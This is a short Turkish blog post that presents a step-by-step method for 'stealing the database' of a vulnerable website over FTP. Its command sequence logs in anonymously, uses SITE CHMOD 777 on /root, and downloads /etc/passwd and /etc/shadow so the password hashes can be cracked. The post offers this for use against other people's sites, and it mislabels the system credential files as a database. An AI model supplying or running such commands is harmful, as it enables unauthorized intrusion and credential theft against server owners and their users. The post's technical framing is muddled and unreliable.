SELAMINALEYKUM ,
Sizlerle bugün açıklı sitenin database'ini çalmayı göstereceğim...
Bu yöntem çok eskidir günümüzde belki çok az sitede çalışır ama yine de denemeye değer.
İlk olarak cmd.exe açıyoruz ve sonrasında sırasıyla şu komutları çalıştırıyoruz:
ftp site.com , bu komut sitenin ftp (file transfer protocol) adresine girmemizi sağlar.
İlk olarak bize isim ve şifre soracak enter'a basıp boş geçiyoruz , ardından:
quote user ftp komutunu çalıştırıyoruz. Sonra da quote pass ftp diyoruz, böylece anonim girişimizi yaptık.
Ardından ise:
quote SITE CHMOD 777 /root , bu komut da root dizininin tüm izinlerini açar ,
daha sonra da:
quote cwd ~root , komutunu çalıştırıyoruz ve sonra da şu 2 komutu çalıştırıp database'i çalmış oluyoruz:
1. komut : get /etc/passwd
2. komut: get /etc/shadow
ve sonra da bu passwd ve shadow dosyalarının içeriğini şifrelenmiş halde bulmuş oluyoruz ,
artık şifreleri gayet rahatlıkla kırabiliriz , iyi günler...
UYARI: Bu yöntem çoğu sitede çalışmaz , açıklı sitede uygulamak gereklidir , ftp site.com desek bile eğer cmd donarsa sitenin ftp adresi yoktur yani bişey yapamayız veya o quote yazan komutlarda Access Denied (erişim engellendi) gibi bişey yazıyorsa yine başaramamışız demektir , ama eğer bağlanmış da
hem de Access Denied mesajı almadan dosyaları çekebilmişsek işte o zaman database'i (veritabanı) almışız demektir....
Hiç yorum yok:
Yorum Gönder